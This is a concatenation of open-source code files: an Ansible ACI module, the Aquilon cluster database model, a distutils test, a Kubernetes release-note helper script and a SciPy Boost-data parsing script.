"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: str
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: str
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: str
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: str
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
def main():
    """Entry point: add, remove or query a node in an ACI maintenance group."""
    argument_spec = aci_argument_spec()
    argument_spec.update(
        group=dict(type='str'),  # Not required for querying all objects
        node=dict(type='str'),
        state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
        name_alias=dict(type='str'),
    )

    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        required_if=[
            ['state', 'absent', ['node', 'group']],
            ['state', 'present', ['node', 'group']],
        ],
    )

    params = module.params
    state = params.get('state')
    group = params.get('group')
    node = params.get('node')
    name_alias = params.get('name_alias')

    aci = ACIModule(module)
    # Node blocks are named "blk<node>-<node>" in the APIC object tree.
    node_blk_name = 'blk{0}-{0}'.format(node)
    aci.construct_url(
        root_class=dict(
            aci_class='maintMaintGrp',
            aci_rn='fabric/maintgrp-{0}'.format(group),
            target_filter={'name': group},
            module_object=group,
        ),
        subclass_1=dict(
            aci_class='fabricNodeBlk',
            aci_rn='nodeblk-{0}'.format(node_blk_name),
            target_filter={'name': node_blk_name},
            module_object=node,
        ),
    )
    aci.get_existing()

    if state == 'present':
        aci.payload(
            aci_class='fabricNodeBlk',
            class_config=dict(
                from_=node,
                to_=node,
                nameAlias=name_alias,
            ),
        )
        aci.get_diff(aci_class='fabricNodeBlk')
        aci.post_config()
    elif state == 'absent':
        aci.delete_config()

    aci.exit_json()


if __name__ == "__main__":
    main()
| gpl-3.0 |
jrha/aquilon | lib/python2.6/aquilon/aqdb/model/cluster.py | 2 | 25571 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" tables/classes applying to clusters """
import re
from datetime import datetime
from sqlalchemy import (Column, Integer, Boolean, String, DateTime, Sequence,
ForeignKey, UniqueConstraint, PrimaryKeyConstraint,
Index)
from sqlalchemy.orm import (object_session, relation, backref, deferred,
joinedload)
from sqlalchemy.orm.attributes import set_committed_value
from sqlalchemy.ext.associationproxy import association_proxy
from aquilon.exceptions_ import ArgumentError
from aquilon.aqdb.column_types import AqStr
from aquilon.aqdb.model import (Base, Host, Location, Personality,
ClusterLifecycle, ServiceInstance, Branch,
Switch, UserPrincipal)
# List of functions allowed to be used in vmhost_capacity_function
# (this dict is installed as __builtins__ for the eval() sandbox in
# EsxCluster capacity calculations; everything else is unavailable there).
restricted_builtins = {'None': None,
                       'dict': dict,
                       'divmod': divmod,
                       'float': float,
                       'int': int,
                       'len': len,
                       'long': long,  # Python 2 only builtin
                       'max': max,
                       'min': min,
                       'pow': pow,
                       'round': round}
def convert_resources(resources):
    """ Convert a list of dicts to a dict of lists.

    Example: [{'a': 1, 'b': 1}, {'a': 2, 'b': 2}]
    becomes  {'a': [1, 2], 'b': [1, 2]}
    """
    by_name = {}
    for resource in resources:
        for key, value in resource.items():
            by_name.setdefault(key, []).append(value)
    return by_name
# Cluster is a reserved word in Oracle
_TN = 'clstr'
_ETN = 'esx_cluster'
_HCM = 'host_cluster_member'
_CSB = 'cluster_service_binding'
_CSBABV = 'clstr_svc_bndg'
_CAP = 'clstr_allow_per'


def _hcm_host_creator(host_tuple):
    """Association-proxy creator for Cluster.hosts.

    Builds a HostClusterMember from a (host, node_index) tuple. The
    parameter was renamed from `tuple`, which shadowed the builtin; the
    proxy calls this positionally, so the rename is caller-compatible.
    """
    host, node_index = host_tuple
    return HostClusterMember(host=host, node_index=node_index)
class Cluster(Base):
    """
    A group of two or more hosts for high availablility or grid
    capabilities. Location constraint is nullable as it may or
    may not be used.
    """
    __tablename__ = _TN

    id = Column(Integer, Sequence('%s_seq' % _TN), primary_key=True)
    cluster_type = Column(AqStr(16), nullable=False)
    name = Column(AqStr(64), nullable=False)

    #Lack of cascaded deletion is intentional on personality
    personality_id = Column(Integer, ForeignKey('personality.id',
                                                name='cluster_prsnlty_fk'),
                            nullable=False)
    branch_id = Column(Integer, ForeignKey('branch.id',
                                           name='cluster_branch_fk'),
                       nullable=False)
    sandbox_author_id = Column(Integer,
                               ForeignKey('user_principal.id',
                                          name='cluster_sandbox_author_fk'),
                               nullable=True)
    location_constraint_id = Column(ForeignKey('location.id',
                                               name='cluster_location_fk'))
    #esx cluster __init__ method overrides this default
    max_hosts = Column(Integer, nullable=True)
    # N+M clusters are defined by setting down_hosts_threshold to M
    # Simple 2-node clusters would have down_hosts_threshold of 0
    down_hosts_threshold = Column(Integer, nullable=True)
    # And that tolerance can be relaxed even further in maintenance windows
    down_maint_threshold = Column(Integer, nullable=True)
    # Some clusters (e.g. grid) don't want fixed N+M down_hosts_threshold, but
    # use percentage goals (i.e. don't alert until 5% of the population dies)
    down_hosts_percent = Column(Boolean(name="%s_down_hosts_ck" % _TN),
                                default=False, nullable=True)
    down_maint_percent = Column(Boolean(name="%s_maint_hosts_ck" % _TN),
                                default=False, nullable=True)
    creation_date = deferred(Column(DateTime, default=datetime.now,
                                    nullable=False))
    status_id = Column(Integer, ForeignKey('clusterlifecycle.id',
                                           name='cluster_status_fk'),
                       nullable=False)
    comments = Column(String(255))

    status = relation(ClusterLifecycle, innerjoin=True)
    location_constraint = relation(Location, lazy=False)
    personality = relation(Personality, lazy=False, innerjoin=True)
    branch = relation(Branch, lazy=False, innerjoin=True, backref='clusters')
    sandbox_author = relation(UserPrincipal)

    hosts = association_proxy('_hosts', 'host', creator=_hcm_host_creator)
    metacluster = association_proxy('_metacluster', 'metacluster')

    __table_args__ = (UniqueConstraint(name, name='cluster_uk'),
                      Index("cluster_branch_idx", branch_id),
                      Index("cluster_prsnlty_idx", personality_id),
                      Index("cluster_location_idx", location_constraint_id))
    __mapper_args__ = {'polymorphic_on': cluster_type}

    @property
    def title(self):
        # Prefer an archetype-specific display name when one is configured.
        if self.personality.archetype.outputdesc is not None:
            return self.personality.archetype.outputdesc
        return self.personality.archetype.name.capitalize() + " Cluster"

    @property
    def dht_value(self):
        """Effective down_hosts_threshold as an absolute host count."""
        if not self.down_hosts_percent:
            return self.down_hosts_threshold
        return int((self.down_hosts_threshold * len(self.hosts)) / 100)

    @property
    def dmt_value(self):
        """Effective down_maint_threshold as an absolute host count."""
        if not self.down_maint_percent:
            return self.down_maint_threshold
        return int((self.down_maint_threshold * len(self.hosts)) / 100)

    @staticmethod
    def parse_threshold(threshold):
        """Parse a threshold string like "5" or "5%".

        Returns a (is_percent, value) tuple.
        """
        is_percent = False
        # Raw string for the regex, per convention
        percent = re.search(r'(\d+)(%)?', threshold)
        thresh_value = int(percent.group(1))
        if percent.group(2):
            is_percent = True
        return (is_percent, thresh_value)

    @property
    def authored_branch(self):
        """Branch name, prefixed with the sandbox author when applicable."""
        if self.sandbox_author:
            return "%s/%s" % (self.sandbox_author.name, self.branch.name)
        return str(self.branch.name)

    @property
    def personality_info(self):
        if self.cluster_type in self.personality.cluster_infos:
            return self.personality.cluster_infos[self.cluster_type]
        else:
            return None

    @property
    def required_services(self):
        return self.personality.services + self.personality.archetype.services

    @property
    def machines(self):
        """Virtual machines backed by this cluster's resources."""
        mach = []
        if self.resholder:
            for res in self.resholder.resources:
                # TODO: support virtual machines inside resource groups?
                if res.resource_type == "virtual_machine":
                    mach.append(res.machine)
        return mach

    def validate_membership(self, host, error=ArgumentError, **kwargs):
        """Check that a host may join this cluster; raise `error` if not."""
        if host.machine.location != self.location_constraint and \
           self.location_constraint not in \
           host.machine.location.parents:
            raise error("Host location {0} is not within cluster "
                        "location {1}.".format(host.machine.location,
                                               self.location_constraint))

        if host.branch != self.branch or \
           host.sandbox_author != self.sandbox_author:
            # Bug fix: raise the caller-supplied exception class here too,
            # instead of hard-coding ArgumentError (inconsistent with the
            # location check above).
            raise error("{0} {1} {2} does not match {3:l} {4} "
                        "{5}.".format(host,
                                      host.branch.branch_type,
                                      host.authored_branch,
                                      self,
                                      self.branch.branch_type,
                                      self.authored_branch))

    def validate(self, max_hosts=None, error=ArgumentError, **kwargs):
        """Validate cluster-wide constraints (required attributes, size)."""
        session = object_session(self)
        # Preload the membership rows together with hosts and machines.
        q = session.query(HostClusterMember)
        q = q.filter_by(cluster=self)
        q = q.options(joinedload('host'),
                      joinedload('host.machine'))
        members = q.all()
        set_committed_value(self, '_hosts', members)

        if self.cluster_type != 'meta':
            for i in [
                    "down_hosts_threshold",
                    "down_hosts_percent",
                    "down_maint_percent",
                    "personality_id"
                    #"branch_id"
            ]:
                if getattr(self, i, None) is None:
                    raise error("Attribute %s must be set for a %s cluster." %
                                (i, self.cluster_type))
        else:
            if self.metacluster:
                raise error("Metaclusters can't contain other metaclusters.")

        if max_hosts is None:
            max_hosts = self.max_hosts
        # Bug fix: compare against the effective limit -- the max_hosts
        # argument may override self.max_hosts, but the old code compared
        # against self.max_hosts while reporting max_hosts.  Also skip the
        # check when no limit is set: in Python 2 "len(...) > None" is
        # always True, which made unlimited clusters fail spuriously.
        if max_hosts is not None and len(self.hosts) > max_hosts:
            raise error("{0} is over capacity of {1} hosts.".format(self,
                                                                    max_hosts))
        if self.metacluster:
            self.metacluster.validate()

    def format_helper(self, format_spec, instance):
        # Based on format_helper() and _get_class_label() in Base
        lowercase = False
        class_only = False
        passthrough = ""
        for letter in format_spec:
            if letter == "l":
                lowercase = True
            elif letter == "c":
                class_only = True
            else:
                passthrough += letter

        if self.cluster_type == 'meta':
            clsname = self.title + " Metacluster"
        else:
            clsname = self.title + " Cluster"

        if lowercase:
            parts = clsname.split()
            # Keep all-uppercase words (e.g. "ESX") intact when lowercasing.
            clsname = ' '.join(map(
                lambda x: x if x[:-1].isupper() else x.lower(), parts))
        if class_only:
            return clsname.__format__(passthrough)
        val = "%s %s" % (clsname, instance)
        return val.__format__(passthrough)


cluster = Cluster.__table__  # pylint: disable=C0103
cluster.info['unique_fields'] = ['name']
class ComputeCluster(Cluster):
    """
    A cluster containing computers - no special characteristics
    """
    __tablename__ = 'compute_cluster'
    __mapper_args__ = {'polymorphic_identity': 'compute'}
    _class_label = 'Compute Cluster'

    # Joined-table inheritance: shares the primary key of the base cluster
    # row; deleting that row cascades to this subtype row.
    id = Column(Integer, ForeignKey('%s.id' % _TN,
                                    name='compute_cluster_fk',
                                    ondelete='CASCADE'),
                primary_key=True)


compute_cluster = ComputeCluster.__table__  # pylint: disable=C0103
compute_cluster.info['unique_fields'] = ['name']
class StorageCluster(Cluster):
    """
    A cluster of storage devices
    """
    __tablename__ = 'storage_cluster'
    __mapper_args__ = {'polymorphic_identity': 'storage'}
    _class_label = 'Storage Cluster'

    # Joined-table inheritance: shares the base cluster row's primary key.
    id = Column(Integer, ForeignKey('%s.id' % _TN,
                                    name='storage_cluster_fk',
                                    ondelete='CASCADE'),
                primary_key=True)

    def validate_membership(self, host, error=ArgumentError, **kwargs):
        """Only hosts of archetype 'filer' may join a storage cluster."""
        super(StorageCluster, self).validate_membership(host=host, error=error,
                                                        **kwargs)
        # NOTE(review): the message interpolates the archetype object, not
        # host.archetype.name as the check does - confirm the intended output.
        if host.archetype.name != "filer":
            raise error("only hosts with archetype 'filer' can be added "
                        "to a storage cluster. The host %s is of archetype %s"
                        % (host.fqdn, host.archetype))


storage_cluster = StorageCluster.__table__  # pylint: disable=C0103
storage_cluster.info['unique_fields'] = ['name']
# ESX Cluster is really a Grid Cluster, but we have
# specific broker-level behaviours we need to enforce
class EsxCluster(Cluster):
    """
    Specifically for our VMware esx based clusters.
    """
    __tablename__ = _ETN
    _class_label = 'ESX Cluster'

    esx_cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
                                                name='%s_cluster_fk' % _ETN,
                                                ondelete='CASCADE'),
                            #if the cluster record is deleted so is esx_cluster
                            primary_key=True)
    # Desired VM:host ratio, stored as two integers (see vm_to_host_ratio).
    vm_count = Column(Integer, default=16, nullable=True)
    host_count = Column(Integer, default=1, nullable=False)

    # Memory capacity override
    memory_capacity = Column(Integer, nullable=True)

    switch_id = Column(Integer,
                       ForeignKey('switch.hardware_entity_id',
                                  name='%s_switch_fk' % _ETN),
                       nullable=True)
    switch = relation(Switch, lazy=False,
                      backref=backref('esx_clusters'))

    __table_args__ = (Index("%s_switch_idx" % _ETN, switch_id),)
    __mapper_args__ = {'polymorphic_identity': 'esx'}

    @property
    def vm_to_host_ratio(self):
        # Human-readable "vm:host" ratio string.
        return '%s:%s' % (self.vm_count, self.host_count)

    @property
    def max_vm_count(self):
        # Largest number of VMs allowed, assuming down_hosts_threshold
        # vmhosts are unavailable.
        if self.host_count == 0:
            return 0
        effective_vmhost_count = len(self.hosts) - self.down_hosts_threshold
        if effective_vmhost_count < 0:
            return 0
        # NOTE(review): Python 2 integer division appears intended here.
        return effective_vmhost_count * self.vm_count / self.host_count

    @property
    def minimum_location(self):
        # Most specific location that contains every member vmhost.
        location = None
        for host in self.hosts:
            if location:
                location = location.merge(host.machine.location)
            else:
                location = host.machine.location
        return location

    @property
    def vmhost_capacity_function(self):
        """ Return the compiled VM host capacity function """
        info = self.personality_info
        if info:
            return info.compiled_vmhost_capacity_function
        else:
            return None

    @property
    def virtmachine_capacity_function(self):
        """ Return the compiled virtual machine capacity function """
        # Only identity mapping for now
        return None

    def get_total_capacity(self, down_hosts_threshold=None):
        """ Return the total capacity available for use by virtual machines """
        if down_hosts_threshold is None:
            down_hosts_threshold = self.down_hosts_threshold

        # With no surviving vmhosts, only an explicit override can provide
        # any capacity.
        if len(self.hosts) <= down_hosts_threshold:
            if self.memory_capacity is not None:
                return {'memory': self.memory_capacity}
            return {'memory': 0}

        func = self.vmhost_capacity_function
        if self.personality_info:
            overcommit = self.personality_info.vmhost_overcommit_memory
        else:
            overcommit = 1

        # No access for anything except built-in functions
        global_vars = {'__builtins__': restricted_builtins}

        resources = []
        for host in self.hosts:
            # This is the list of variables we want to pass to the capacity
            # function
            local_vars = {'memory': host.machine.memory}
            if func:
                # Sandboxed eval: globals expose only restricted_builtins.
                rec = eval(func, global_vars, local_vars)
            else:
                rec = local_vars

            # Apply the memory overcommit factor. Force the result to be
            # an integer since it looks better on display
            if 'memory' in rec:
                rec['memory'] = int(rec['memory'] * overcommit)

            resources.append(rec)

        # Convert the list of dicts to a dict of lists
        resmap = convert_resources(resources)

        # Drop the <down_hosts_threshold> largest elements from every list, and
        # sum the rest
        for name in resmap:
            reslist = sorted(resmap[name])
            if down_hosts_threshold > 0:
                reslist = reslist[:-down_hosts_threshold]
            resmap[name] = sum(reslist)

        # Process overrides
        if self.memory_capacity is not None:
            resmap['memory'] = self.memory_capacity

        return resmap

    def get_capacity_overrides(self):
        """Used by the raw formatter to flag a capacity as overridden."""
        return {'memory': self.memory_capacity}

    def get_total_usage(self):
        """ Return the amount of resources used by the virtual machines """
        func = self.virtmachine_capacity_function

        # No access for anything except built-in functions
        global_vars = {'__builtins__': restricted_builtins}

        resmap = {}
        for machine in self.machines:
            # This is the list of variables we want to pass to the capacity
            # function
            local_vars = {'memory': machine.memory}
            if func:
                res = eval(func, global_vars, local_vars)
            else:
                res = local_vars
            for name, value in res.items():
                if name not in resmap:
                    resmap[name] = value
                else:
                    resmap[name] += value
        return resmap

    def validate(self, vm_part=None, host_part=None, current_vm_count=None,
                 current_host_count=None, down_hosts_threshold=None,
                 down_hosts_percent=None,
                 error=ArgumentError, **kwargs):
        """Validate the VM:host ratio and capacity limits for the cluster."""
        super(EsxCluster, self).validate(error=error, **kwargs)

        # Preload resources
        resource_by_id = {}
        if self.resholder:
            from aquilon.aqdb.model import VirtualMachine, ClusterResource
            session = object_session(self)
            q = session.query(VirtualMachine)
            q = q.join(ClusterResource)
            q = q.filter_by(cluster=self)
            q = q.options([joinedload('machine'),
                           joinedload('machine.primary_name'),
                           joinedload('machine.primary_name.fqdn')])
            for res in q:
                resource_by_id[res.id] = res

        if vm_part is None:
            vm_part = self.vm_count
        if host_part is None:
            host_part = self.host_count
        if current_vm_count is None:
            current_vm_count = len(self.machines)
        if current_host_count is None:
            current_host_count = len(self.hosts)
        if down_hosts_threshold is None:
            down_hosts_threshold = self.down_hosts_threshold
        if down_hosts_percent is None:
            down_hosts_percent = self.down_hosts_percent

        # It doesn't matter how many vmhosts we have if there are no
        # virtual machines.
        if current_vm_count <= 0:
            return

        if host_part == 0:
            raise error("Invalid ratio of {0}:{1} for {2:l}.".format(
                vm_part, host_part, self))

        # For calculations, assume that down_hosts_threshold vmhosts
        # are not available from the number currently configured.
        if down_hosts_percent:
            adjusted_host_count = current_host_count - \
                int(down_hosts_threshold * current_host_count / 100)
            dhtstr = "%d%%" % down_hosts_threshold
        else:
            adjusted_host_count = current_host_count - down_hosts_threshold
            dhtstr = "%d" % down_hosts_threshold

        if adjusted_host_count <= 0:
            raise error("%s cannot support VMs with %s "
                        "vmhosts and a down_hosts_threshold of %s" %
                        (format(self), current_host_count, dhtstr))

        # The current ratio must be less than the requirement...
        # cur_vm / cur_host <= vm_part / host_part
        # cur_vm * host_part <= vm_part * cur_host
        # Apply a logical not to test for the error condition...
        if current_vm_count * host_part > vm_part * adjusted_host_count:
            raise error("%s VMs:%s hosts in %s violates "
                        "ratio %s:%s with down_hosts_threshold %s" %
                        (current_vm_count, current_host_count, format(self),
                         vm_part, host_part, dhtstr))

        capacity = self.get_total_capacity()
        usage = self.get_total_usage()
        for name, value in usage.items():
            # Skip resources that are not restricted
            if name not in capacity:
                continue
            if value > capacity[name]:
                raise error("{0} is over capacity regarding {1}: wanted {2}, "
                            "but the limit is {3}.".format(self, name, value,
                                                           capacity[name]))
        return

    def __init__(self, **kw):
        # ESX clusters default to a host limit of 8 (the base Cluster
        # leaves max_hosts NULL).
        if 'max_hosts' not in kw:
            kw['max_hosts'] = 8
        super(EsxCluster, self).__init__(**kw)


esx_cluster = EsxCluster.__table__  # pylint: disable=C0103
esx_cluster.info['unique_fields'] = ['name']
class HostClusterMember(Base):
    """ Association table for clusters and their member hosts """
    __tablename__ = _HCM

    cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
                                            name='hst_clstr_mmbr_clstr_fk',
                                            ondelete='CASCADE'),
                        #if the cluster is deleted, so is membership
                        nullable=False)
    host_id = Column(Integer, ForeignKey('host.machine_id',
                                         name='hst_clstr_mmbr_hst_fk',
                                         ondelete='CASCADE'),
                     #if the host is deleted, so is the membership
                     nullable=False)
    # Position of the host within the cluster; unique per cluster.
    node_index = Column(Integer, nullable=False)

    # Association Proxy and relation cascading: We need cascade=all
    # on backrefs so that deletion propagates to avoid AssertionError:
    # Dependency rule tried to blank-out primary key column on deletion
    # of the Cluster and it's links. On the contrary do not have
    # cascade='all' on the forward mapper here, else deletion of
    # clusters and their links also causes deleteion of hosts (BAD)
    cluster = relation(Cluster, lazy=False, innerjoin=True,
                       backref=backref('_hosts', cascade='all, delete-orphan'))

    # This is a one-to-one relation, so we need uselist=False on the backref
    host = relation(Host, lazy=False, innerjoin=True,
                    backref=backref('_cluster', uselist=False,
                                    cascade='all, delete-orphan'))

    __table_args__ = (PrimaryKeyConstraint(cluster_id, host_id,
                                           name="%s_pk" % _HCM),
                      UniqueConstraint(host_id,
                                       name='host_cluster_member_host_uk'),
                      UniqueConstraint(cluster_id, node_index,
                                       name='host_cluster_member_node_uk'))


hcm = HostClusterMember.__table__  # pylint: disable=C0103
hcm.info['unique_fields'] = ['cluster', 'host']

# Convenience accessor: host.cluster reaches through the association row.
Host.cluster = association_proxy('_cluster', 'cluster')
class ClusterAllowedPersonality(Base):
    """Association table: personalities permitted as members of a cluster."""
    __tablename__ = _CAP

    cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
                                            name='clstr_allowed_pers_c_fk',
                                            ondelete='CASCADE'),
                        nullable=False)
    personality_id = Column(Integer, ForeignKey('personality.id',
                                                name='clstr_allowed_pers_p_fk',
                                                ondelete='CASCADE'),
                            nullable=False)

    __table_args__ = (PrimaryKeyConstraint(cluster_id, personality_id),
                      Index('%s_prsnlty_idx' % _CAP, personality_id))


Cluster.allowed_personalities = relation(Personality,
                                         secondary=ClusterAllowedPersonality.__table__)
class ClusterServiceBinding(Base):
    """
    Makes bindings of service instances to clusters
    """
    __tablename__ = _CSB
    _class_label = 'Cluster Service Binding'

    cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
                                            name='%s_cluster_fk' % _CSBABV,
                                            ondelete='CASCADE'),
                        nullable=False)
    service_instance_id = Column(Integer,
                                 ForeignKey('service_instance.id',
                                            name='%s_srv_inst_fk' % _CSBABV),
                                 nullable=False)

    __table_args__ = (PrimaryKeyConstraint(cluster_id, service_instance_id),
                      Index('%s_si_idx' % _CSBABV, service_instance_id))


Cluster.service_bindings = relation(ServiceInstance,
                                    secondary=ClusterServiceBinding.__table__)
| apache-2.0 |
technologiescollege/Blockly-rduino-communication | scripts_XP/Lib/distutils/tests/test_install_headers.py | 147 | 1264 | """Tests for distutils.command.install_headers."""
import sys
import os
import unittest
import getpass
from distutils.command.install_headers import install_headers
from distutils.tests import support
from test.support import run_unittest
class InstallHeadersTestCase(support.TempdirManager,
                             support.LoggingSilencer,
                             support.EnvironGuard,
                             unittest.TestCase):
    """Exercise the install_headers command end to end."""

    def test_simple_run(self):
        # Create two header files in a fresh temporary directory.
        src_dir = self.mkdtemp()
        headers = [os.path.join(src_dir, name)
                   for name in ('header1', 'header2')]
        for header in headers:
            self.write_file(header)

        pkg_dir, dist = self.create_dist(headers=headers)
        cmd = install_headers(dist)
        self.assertEqual(cmd.get_inputs(), headers)

        # Run the command against an install dir inside the package dir.
        cmd.install_dir = os.path.join(pkg_dir, 'inst')
        cmd.ensure_finalized()
        cmd.run()

        # Both headers must have been installed.
        self.assertEqual(len(cmd.get_outputs()), 2)
def test_suite():
    """Build the suite of all tests in this module (distutils test runner)."""
    suite = unittest.makeSuite(InstallHeadersTestCase)
    return suite


if __name__ == "__main__":
    run_unittest(test_suite())
| gpl-3.0 |
nebril/kubernetes | hack/lookup_pull.py | 246 | 1299 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Script to print out PR info in release note format.
import json
import sys
import urllib2
# GitHub API endpoint for a single pull request.
# NOTE(review): still points at the old GoogleCloudPlatform/kubernetes
# repository location - confirm before use.
PULLQUERY=("https://api.github.com/repos/"
           "GoogleCloudPlatform/kubernetes/pulls/{pull}")
# Keys into the pull-request JSON payload returned by the API.
LOGIN="login"
TITLE="title"
USER="user"
def print_pulls(pulls):
    """Print one markdown release-note line per pull request number.

    Fetches each PR from the GitHub API, so network access is required.
    Python 2 only (print statement, urllib2).
    """
    for pull in pulls:
        d = json.loads(urllib2.urlopen(PULLQUERY.format(pull=pull)).read())
        print "* {title} #{pull} ({author})".format(
            title=d[TITLE], pull=pull, author=d[USER][LOGIN])
if __name__ == "__main__":
    if len(sys.argv) < 2:
        # Bug fix: the usage string contained a "{cmd}" placeholder that was
        # printed literally - it was never passed through format().  Now the
        # actual program name is substituted.  The print(...) call form works
        # under both Python 2 (parenthesized print statement) and Python 3.
        print(("Usage: {cmd} <pulls>...: Prints out short "
               "markdown description for PRs appropriate for release notes.")
              .format(cmd=sys.argv[0]))
        sys.exit(1)
    print_pulls(sys.argv[1:])
| apache-2.0 |
vberaudi/scipy | scipy/special/utils/convert.py | 77 | 5554 | # This script is used to parse BOOST special function test data into something
# we can easily import in numpy. It is ugly as hell, but it works.
from __future__ import division, print_function, absolute_import
import re
import os
from numpy import arccosh, log1p, expm1, arcsinh, arctanh
from scipy.special import digamma, erfc, expi, erf, expn, gamma, gammaln, iv
# Where to put the data (directory will be created)
# Where to put the data (directory will be created)
DATA_DIR = 'data'
# where to pull out boost data: assume a SVN checkout of boost (here in
# /Users/david/src/dev/boost/trunk)
BOOST_SRC = "boostmath/test"

# Matches C++ line comments, which are skipped while scanning data files.
CXX_COMMENT = re.compile(r'^\s+//')
# Matches the beginning of one SC_(...) row of test-data values.
DATA_REGEX = re.compile(r'^\s+/*\{*\s*SC_')
# Matches one numeric literal (optional sign, optional exponent).
ITEM_REGEX = re.compile(r'[+-]?\d*\.?\d+(?:[eE][+-]?\d+)?')
# Matches the boost::array declaration header; captures the inner array
# size (columns), the outer array size (rows) and the variable name.
HEADER_REGEX = re.compile(
    r'const boost::array\<boost::array\<.*, (\d+)\>, (\d+)\> ([a-zA-Z_\d]+)')
# List of boost test data files to parse
DATA_FILES = [
'acosh_data.ipp',
'asinh_data.ipp',
'assoc_legendre_p.ipp',
'atanh_data.ipp',
'bessel_i_data.ipp',
'bessel_i_int_data.ipp',
'bessel_j_data.ipp',
'bessel_j_int_data.ipp',
'bessel_j_large_data.ipp',
'bessel_k_data.ipp',
'bessel_k_int_data.ipp',
'bessel_y01_data.ipp',
'bessel_yn_data.ipp',
'bessel_yv_data.ipp',
'beta_exp_data.ipp',
'beta_med_data.ipp',
'beta_small_data.ipp',
'binomial_data.ipp',
'binomial_large_data.ipp',
'binomial_quantile.ipp',
'cbrt_data.ipp',
'digamma_data.ipp',
'digamma_neg_data.ipp',
'digamma_root_data.ipp',
'digamma_small_data.ipp',
'ellint_e2_data.ipp',
'ellint_e_data.ipp',
'ellint_f_data.ipp',
'ellint_k_data.ipp',
'ellint_pi2_data.ipp',
'ellint_pi3_data.ipp',
'ellint_pi3_large_data.ipp',
'ellint_rc_data.ipp',
'ellint_rd_data.ipp',
'ellint_rf_data.ipp',
'ellint_rj_data.ipp',
'erfc_inv_big_data.ipp',
'erfc_inv_data.ipp',
'erf_data.ipp',
'erf_inv_data.ipp',
'erf_large_data.ipp',
'erf_small_data.ipp',
'expint_1_data.ipp',
'expint_data.ipp',
'expinti_data_double.ipp',
'expinti_data.ipp',
'expinti_data_long.ipp',
'expint_small_data.ipp',
'gamma_inv_big_data.ipp',
'gamma_inv_data.ipp',
'gamma_inv_small_data.ipp',
'hermite.ipp',
'hypergeometric_dist_data2.ipp',
'hypergeometric_test_data.ipp',
'ibeta_data.ipp',
'ibeta_int_data.ipp',
'ibeta_inva_data.ipp',
'ibeta_inv_data.ipp',
'ibeta_large_data.ipp',
'ibeta_small_data.ipp',
'igamma_big_data.ipp',
'igamma_int_data.ipp',
'igamma_inva_data.ipp',
'igamma_med_data.ipp',
'igamma_small_data.ipp',
'laguerre2.ipp',
'laguerre3.ipp',
'legendre_p.ipp',
'legendre_p_large.ipp',
'log1p_expm1_data.ipp',
'ncbeta_big.ipp',
'ncbeta.ipp',
'nccs_big.ipp',
'nccs.ipp',
'nct.ipp',
'negative_binomial_quantile.ipp',
'poisson_quantile.ipp',
'powm1_sqrtp1m1_test.cpp',
'sph_bessel_data.ipp',
'spherical_harmonic.ipp',
'sph_neumann_data.ipp',
#'test_bessel_i.cpp',
#'test_bessel_j.cpp',
#'test_bessel_k.cpp',
#'test_bessel_y.cpp',
# Those 3 files use arithmetic operations whithin the data, so we can't parse
# them naively
#'test_ellint_1.cpp',
#'test_ellint_2.cpp',
#'test_ellint_3.cpp',
'test_gamma_data.ipp',
'tgamma_delta_ratio_data.ipp',
'tgamma_delta_ratio_int2.ipp',
'tgamma_delta_ratio_int.ipp',
'tgamma_ratio_data.ipp',
'zeta_1_below_data.ipp',
'zeta_1_up_data.ipp',
'zeta_data.ipp',
'zeta_neg_data.ipp',
]
def _raw_data(line):
    """Extract every numeric literal from one comma-separated data line.

    Returns the list of matched numeric strings, in order of appearance;
    tokens with no numeric content are silently dropped.
    """
    matches = (ITEM_REGEX.search(tok) for tok in line.split(','))
    return [m.group(0) for m in matches if m is not None]
def parse_ipp_file(filename):
    """Parse one boost .ipp test-data file.

    Returns a dict mapping each boost::array variable name found in the
    file to its data: a list of rows, each row being the list of numeric
    strings extracted from one data line.

    Raises ValueError if a header promises n rows but a different number
    of data lines is found.
    """
    print(filename)
    a = open(filename, 'r')
    lines = a.readlines()
    data = {}
    i = 0
    # Manual index-based scan: a header line announces how many rows to
    # expect, and C++ comment lines may be interleaved with the data.
    while (i < len(lines)):
        line = lines[i]
        m = HEADER_REGEX.search(line)
        if m:
            d = int(m.group(1))  # columns per row (informational only)
            n = int(m.group(2))  # number of rows expected
            print("d = {0}, n = {1}".format(d, n))
            cdata = []
            i += 1
            line = lines[i]
            # Skip comments
            while CXX_COMMENT.match(line):
                i += 1
                line = lines[i]
            # Accumulate consecutive data rows, tolerating embedded comments.
